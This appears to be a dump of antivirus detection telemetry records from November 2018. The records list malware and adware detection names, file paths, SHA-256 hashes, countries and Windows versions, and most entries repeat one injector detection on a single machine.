  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5ed8ac2fa3c046dcbd834ec5f7adc45c6b16d48ef4f1c490f3f336ab072cc7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T02:20:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vcredist_x64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x64.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='5741a738e203397947f6519bda85271e18dab035aaef1750bcca6a7fd9eb93d7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220253-91a6876e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-220253-91A6876E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153730-f166b731', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153730-F166B731', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054639-a396d0ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054639-A396D0EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061339-692399ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061339-692399AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051533-4b757b07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051533-4B757B07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061359-753eb81c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061359-753EB81C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-233542-a4623d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_709bae36\\AVSCAN-20181101-233529-A3074334\\AVSCAN-20181101-233542-A4623D79', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:35:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061220-39d90330', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061220-39D90330', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054230-0f53b70c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054230-0F53B70C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133831-c2ee31fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133831-C2EE31FD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054233-11012f4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054233-11012F4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053904-94149900', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053904-94149900', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051524-45b7cb16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051524-45B7CB16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145923-6e7b783a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6879e40\\AVSCAN-20181102-145735-61E83EE8\\AVSCAN-20181102-145923-6E7B783A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeach.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\NBEACH\\NBEACH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.063\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.063\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061945-43106fd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061945-43106FD4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='softwareupdater.exe', filepath='C:\\Users\\X\\Downloads\\SoftwareUpdater.exe', filesize=144000, name='ADWARE/BrowseFox.Gen7.#M300.#R604062'), hash='5e5afe9b7ccfda81c0afa92ced484eed968a067d5c36f038bdc3ef1eee78ed66', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T19:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='662f636ba2e6eae4b1ad17f0f02c75e7ac9bfb244af088e4dee3c8716eee5cd8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\662F636BA2E6EAE4B1AD17F0F02C75E7AC9BFB244AF088E4DEE3C8716EEE5CD8', filesize=152000, name='TR/Dropper.Gen.#M300.#R324'), hash='662f636ba2e6eae4b1ad17f0f02c75e7ac9bfb244af088e4dee3c8716eee5cd8', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:36:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053052-6f4ccc89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053052-6F4CCC89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061058-08fe2cf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061058-08FE2CF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053522-0fd2b6c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053522-0FD2B6C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052625-cfc32ff4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052625-CFC32FF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051013-8cbb3e55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051013-8CBB3E55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061925-378dbdd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061925-378DBDD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061733-f4d59ece', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061733-F4D59ECE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050948-7dd04d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050948-7DD04D90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052455-9a6d708b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052455-9A6D708B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053851-8c86e442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053851-8C86E442', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060410-15f6cf1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060410-15F6CF1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060608-5c72ff72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060608-5C72FF72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061652-dc34acc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061652-DC34ACC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060841-b7b2681b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060841-B7B2681B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062011-52ec2577', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062011-52EC2577', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054917-01deb8a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054917-01DEB8A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-ca5dafa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CA5DAFA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055201-63be8bea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055201-63BE8BEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061043-000b8110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061043-000B8110', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050402-af924d8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050402-AF924D8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052429-8acb113c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052429-8ACB113C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053634-3b178b2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053634-3B178B2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052811-0f5b2146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052811-0F5B2146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052440-916b0ad2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052440-916B0AD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053314-c3dc1fda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053314-C3DC1FDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053740-62400496', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053740-62400496', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060734-8fde8b9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060734-8FDE8B9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054432-5810f4d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054432-5810F4D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054340-38d53c3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054340-38D53C3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051212-d3c08ac8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051212-D3C08AC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:11Z'), dt=datetime.date(2018, 11, 2)),
